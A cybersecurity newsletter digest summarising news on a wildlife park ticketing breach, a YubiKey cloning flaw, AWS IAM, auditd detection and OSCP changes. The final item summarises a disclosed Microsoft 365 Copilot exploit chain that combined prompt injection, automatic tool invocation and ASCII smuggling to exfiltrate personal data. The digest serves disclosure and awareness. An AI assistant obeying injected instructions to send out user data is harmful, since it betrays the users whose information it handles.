🔓
Attacks & Vulnerabilities
Thousands Exposed in Fota Wildlife Park Breach (4 minute read)
Fota Wildlife Park is notifying customers who bought tickets on the park's website since May 12 of a breach. Users are being advised to change any passwords associated with the site, be aware of phishing attempts to their email, and notably to cancel any debit or credit cards used. The park has not revealed exact details on what data was stolen, how the data was stolen, or the number of customers impacted
YubiKeys are vulnerable to cloning attacks thanks to newly discovered side channel (3 minute read)
The YubiKey 5 hardware token for two-factor authentication has a cryptographic flaw that makes it vulnerable to cloning attacks when physically accessed by an attacker. Yubico has confirmed that all YubiKey 5 models are susceptible to cloning due to a side channel vulnerability in the Infineon microcontroller used in various authentication devices. Updating firmware on affected YubiKeys is not possible, leaving them permanently vulnerable to potential attacks.
AWS IAM: A Comprehensive Guide Towards Least Privilege (11 minute read)
This article provides a comprehensive overview of the various tools that are available to fine tune AWS IAM access. It suggests some important SCPs such as limiting access to specific regions and blocking root user access, establishing zones of trust, utilizing permissions boundaries, using IAM Access Analyzer, and separating humans and non-human identities. The article suggests starting with a more permissive set of permissions to understand how your team utilizes AWS and then limit permissions from there.
Linux Detection Engineering with Auditd (28 minute read)
The first part in a series on Linux detection engineering from Elastic Labs, which focuses on installing and configuring auditd. The first part of the article lists installation methods for auditd and explains the types of rules that auditd supports. Control type rules configure the auditd process, file system rules watch files for read, write, and execute actions, and system call rules are the powerhouse of auditd and specify which syscalls to monitor and log. The second part focuses on how to use the Auditd Manager Elastic integration to install and configure auditd at scale and presents Elastic alerts for various scenarios.
Changes to the OSCP (5 minute read)
Offsec has announced changes to the exam format of the OSCP exam including the elimination of bonus points and an assumed breach model for the Active Directory portion. It has also introduced the OSCP+ designation, which will require recipients to renew their certification via CPEs, retake the exam, or earn a higher level cert every 3 years to maintain the + distinction. The community is split on reactions to the announcement, with some feeling that the OSCP+ is a cash grab and that the AD changes are too easy, while others are celebrating that the certification will now fulfill DoD requirements.
Microsoft Copilot: From Prompt Injection to Exfiltration of Personal Information (6 minute read)
This blog post discusses a vulnerability in Microsoft 365 Copilot that allowed personal information theft through prompt injection. The exploit chain involves techniques like prompt injection, automatic tool invocation, and ASCII smuggling to exfiltrate data without user consent. The author responsibly disclosed the exploit to Microsoft, leading to fixes implemented to prevent further exploitation.